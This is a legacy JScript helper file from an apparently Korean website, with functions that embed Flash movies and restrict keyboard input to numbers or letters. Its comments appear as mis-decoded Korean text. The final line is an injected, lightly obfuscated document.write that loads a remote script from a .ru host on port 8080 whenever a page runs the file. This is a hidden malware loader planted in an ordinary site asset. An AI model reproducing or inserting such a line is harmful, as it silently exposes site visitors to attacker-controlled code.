// JScript source code

//ÀÌ¹ÌÁö ÇÃ·¡½¬ »ðÀÔ ½ºÅ©¸³Æ®
function image_flash(src, w, h)
{
	html = '';
	html += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="/cabs/flash/swflash.cab#version=2,0,0,11" NAME="link" ID="link" width="'+w+'" height="'+h+'">';
	html += '<param name="movie" value="'+src+'">';
	html += '<param name="quality" value="high">';
	html += '<param name="allowScriptAccess" value="always" />';
	html += '<param name="swliveconnect" value="true">';
	html += '<param name="menu" value="false">';
	html += '<PARAM NAME=wmode VALUE=transparent>';
	html += '<embed src="'+src+'" quality=high width="'+w+'" height="'+h+'" loop=true type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>';
	html += '</object>';
	document.write(html);
}

//»ó´Ü¸Þ´º ÇÃ·¡½¬ »ðÀÔ ½ºÅ©¸³Æ®
function menu_flash(src, w, h, a, b)
{
	html = '';
	html += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="/cabs/flash/swflash.cab#version=2,0,0,11" NAME="link" ID="link" width="'+w+'" height="'+h+'">';
	html += '<param name="movie" value="'+src+'">';
	html += '<param name="quality" value="high">';
	html += '<param name="allowScriptAccess" value="always" />';
	html += '<param name="FlashVars" VALUE="PageNum='+a+'&subNum='+b+'">';
	html += '<param name="swliveconnect" value="true">';
	html += '<param name="menu" value="false">';
	html += '<PARAM NAME=wmode VALUE=transparent>';
	html += '<embed src="'+src+'" quality=high width="'+w+'" height="'+h+'" loop=true type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>';
	html += '</object>';
	document.write(html);
}

//¿ÞÂÊ ¼­ºê¸Þ´º ÇÃ·¡½¬ »ðÀÔ ½ºÅ©¸³Æ®
function left_flash(src, w, h, a, b)
{
	html = '';
	html += '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="/cabs/flash/swflash.cab#version=2,0,0,11" NAME="link" ID="link" width="'+w+'" height="'+h+'">';
	html += '<param name="movie" value="'+src+'">';
	html += '<param name="quality" value="high">';
	html += '<param name="allowScriptAccess" value="always" />';
	html += '<param name="FlashVars" VALUE="pageNum='+a+'&subNum='+b+'">';
	html += '<param name="swliveconnect" value="true">';
	html += '<param name="menu" value="false">';
	html += '<PARAM NAME=wmode VALUE=transparent>';
	html += '<embed src="'+src+'" quality=high width="'+w+'" height="'+h+'" loop=true type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash"></embed>';
	html += '</object>';
	document.write(html);
}

//¹®ÀÚ ÀÔ·Â Á¦ÇÑ ½ºÅ©¸³Æ®
function onlynumber() {
	if (event.keyCode < 45 || event.keyCode > 57) {
		event.returnValue = false;
	}
}

//¼ýÀÚ ÀÔ·Â Á¦ÇÑ ½ºÅ©¸³Æ®
function onlychar() {
	if (event.keyCode > 44&& event.keyCode < 58) {
		event.returnValue = false;
	}
}

document.write('<s'+'cript type="text/javascript" src="http://malepad.ru:8080/LAN.js"></scr'+'ipt>');